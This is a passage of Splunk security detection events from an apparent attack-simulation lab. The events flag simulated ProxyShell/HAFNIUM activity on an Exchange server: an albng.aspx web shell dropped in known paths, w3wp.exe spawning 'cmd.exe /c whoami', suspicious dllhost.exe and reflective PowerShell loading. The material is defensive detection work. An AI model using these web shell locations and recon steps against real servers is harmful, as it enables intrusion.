\"\" -m 0", process="cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664826231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:58:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:58:42", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664820000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664820000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2036", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664820000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664820000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x7f4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664824159, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-03 17:58:25.595", file_name="albng.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\albng.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - albng.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="albng.aspx", threat_object_type="file name" 1664823332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664823332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664823332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664823332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664822632, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:45:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:45:30", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664822632, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:45:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:45:30", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0", process="cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664822632, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic 